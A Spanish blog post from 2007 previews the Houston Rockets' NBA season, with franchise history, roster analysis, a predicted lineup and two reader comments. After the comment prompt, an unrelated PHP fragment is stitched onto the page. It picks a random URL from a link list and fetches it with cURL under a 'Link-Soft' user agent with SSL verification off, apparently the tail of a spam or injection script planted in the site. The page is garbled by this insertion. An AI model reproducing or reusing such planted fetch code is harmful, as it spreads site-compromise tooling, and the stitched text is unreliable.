Houston Rockets: la hora de la verdad

03 de October de 2007 por Olafur

Parece que fue ayer cuando, de la mano del gran Hakeem Olajuwon, ganaron de manera consecutiva sus dos únicos anillos, pero ya hace 12 años de aquello. Tras el segundo anillo, las lesiones, el envejecimiento de la plantilla y, por qué no decirlo, la vuelta de un tal Michael Jordan, hicieron que a pesar de llegar a coincidir Olajuwon, Charles Barkley y Clyde Drexler no pudieran volver a ganar el anillo al caer frente a los Sonics o, de manera consecutiva, frente a los Jazz. Tras la retirada de Drexler consiguieron a Scottie Pippen vía trade pero la decepción fue aún mayor al caer en primera ronda de Playoffs frente a Lakers. La veteranía y las graves lesiones de Barkley y Olajuwon cerraron un ciclo y pasaron los galones definitivos a jóvenes como el pujante Steve Francis o Cuttino Mobley. Curiosamente una lesión del primero lastró la temporada 2001/2002, con la suerte para la franquicia de tener el número 1 del draft para el 2002.

Gracias a este hecho seleccionaron al pívot chino Yao Ming, y con la posterior adquisición del talentoso Tracy McGrady en la temporada 2004-2005 a cambio de Steve Francis, Cuttino Mobley y Kelvin Cato, volvieron a tener una base sobre la que construir un equipo campeón.

Aquel año perdieron 4-3 con los poderosos Mavericks en primera ronda de Playoffs. Pero al año siguiente volvieron los viejos fantasmas en la franquicia con lesiones de larga duración de Ming y problemas crónicos en la espalda para McGrady que provocaron que no entraran en la postemporada.

Ya la temporada pasada el equipo parecía que podía pasar de primera ronda de Playoffs, pero se llevó una pequeña decepción cayendo a las primeras de cambio a manos de los emergentes Utah Jazz. Este hecho no emborrona la gran temporada regular de los Rockets, que se sobrepusieron a la grave lesion de su pívot estrella Yao Ming (se perdió 34 partidos), y a los problemas de espalda de su alero Tracy McGrady, que se recuperó en Navidades milagrosamente de manos del especialista John Patterson y les llevó a un record de 52-30 que muestra el potencial del equipo.

Un cambio importante esta temporada se da en el banquillo; del juego previsible y monocorde de Jeff Van Gundy pasarán al juego alegre y dinámico de su sustituto, Rick Adelman, que favorecerá el juego creativo de estas dos estrellas y provocará así posiciones claras para buenos tiradores como Shane Battier o Luther Head y favoreciendo el juego entre pívots, hasta ahora inexistente.

Si a esto unimos la vuelta de un hijo pródigo venido a menos como Steve Francis, las rachas anotadoras de Mike James, el fichaje del gran ala-pívot argentino Luis Scola (que reemplazará al traspasado Juwan Howard) y la previsible recuperación de Bonzi Wells, que de la mano de Adelman firmó su temporada NBA más completa, queda un roster plagado de talento ofensivo, en el que Battier, Mutombo y Chuck Hayes se tendrán que multiplicar en la otra parte de la cancha.

Jugadores que pueden también echar una mano son el base rookie Aaron Brooks, que es un auténtico espectáculo en el 1 contra 1, el alero Steve Novak, con una de las mejores muñecas de la NBA, y el otrora base titular Rafer Alston, involucrado en numerosos problemas con la justicia y con futuro incierto.

Quedan como jugadores marginales el semi-retirado Bob Sura, el escolta Kirk Snyder, el alero rookie Carl Landry, Justin Reed o Jackie Butler.

Si las lesiones le respetan, el equipo está hecho para pasar esa primera ronda y pelearse con los gallitos del Oeste como Suns, Spurs o Mavericks.

Quinteto: Francis, McGrady, Battier, Scola y Yao

Sexto hombre: Head/Wells

Previsión: Final de Conferencia

Comenta

2 comentarios a esta entrada

  1. arivas dice:
    #1

    Gran artículo, señor Olafur.

    Juego previsible y monocorde de Van Gundy… jeje.

    A mí me dan buenas sensaciones estos Rockets, si les respetan las lesiones para mí son grandes candidatos.

      Citar

  2. Pow_Brolin dice:
    #2

    Ojito con el hijo prodigo ….. vuelve Steve “Franchise” a casa con ganas de marcha !!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>